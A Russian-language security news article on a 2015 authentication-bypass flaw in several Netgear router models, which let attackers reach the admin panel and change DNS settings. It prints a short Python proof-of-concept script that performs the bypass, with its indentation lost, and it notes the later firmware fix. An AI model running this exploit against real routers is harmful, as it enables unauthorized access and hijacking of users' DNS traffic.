В роутерах компании Netgear обнаружена серьезная уязвимость, позволяющая изменить настройки DNS, минуя аутентификацию. Эксплоит опубликован, багу подвержено более 5000 устройств, но компания еще не выпустила исправление.

Эксперт в области информационной безопасности Джо Гайрон (Joe Giron) рассказал BBC, что в роутерах Netgear наличествует серьезный баг.  Гайрон имел неудовольствие убедиться в этом лично, так как 28 сентября 2015 года он обнаружил, что взломали его собственный роутер. В частности, хакеры изменили DNS на роутере Гайрона на собственный вредоносный адрес.

«Обычно я использую DNS Google, но в настройках оказалось прописано что-то совершенно иное. Два или три дня весь мой DNS-трафик проходил через непонятный сервер», — рассказывает Гайрон.

Оказалось, что данный баг ранее обнаружили специалисты шведской фирмы Compass Security, они же недавно раскрыли информацию о бреши и опубликовали в открытом доступе эксплоит, выждав положенное время. То есть в Netgear уже знают о проблеме, просто компания не успела подготовить патч в срок.

Согласно опубликованной Compass Security информации, эксплуатировать уязвимость и проникнуть в админку очень легко, это можно сделать как через браузер, так и написав простой эксплоит. Когда пользователь запрашивает веб-интерфейс роутера, инициируется процесс базовой HTTP-аутентификации. Если пользователь не знает логина и пароля, ему покажут файл 401_access_denied.htm. В этот момент атакующий может несколько раз использовать http://<ROUTER-IP>/BRS_netgear_success.html в URL, в результате чего попадает в админку, минуя авторизацию. Python-скрипт:

import os
import urllib2
import time
import sys

try:
first = urllib2.urlopen("http://" + sys.argv[1])
print "No password protection!"
except:
print "Password protection detected!"
print "Executing exploit..."
for i in range(0,3):
time.sleep(1)
urllib2.urlopen("http://" + sys.argv[1] + "/BRS_netgear_success.html")

second = urllib2.urlopen("http://" + sys.argv[1])
if second.getcode() == 200:
print "Bypass successfull. Now use your browser to have a look at the admin interface."

Уязвимости подвержены прошивки N300_1.1.0.31_1.0.1.img и N300-1.1.0.28_1.0.1.img, то есть следующие девайсы:

  • JNR1010v2
  • JWNR2000v5
  • JWNR2010v5
  • WNR614
  • WNR618
  • WNR1000v4
  • WNR2020
  • WNR2020v2

Специалисты Netgear существование бага признают, называют его "очень серьезным" и обещают представить патч 14 октября 2015 года.

UPD 13.10.2015
Компания Netgear представила обновленную прошивку и рекомендует всем обновиться.

Фото: Netgear

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии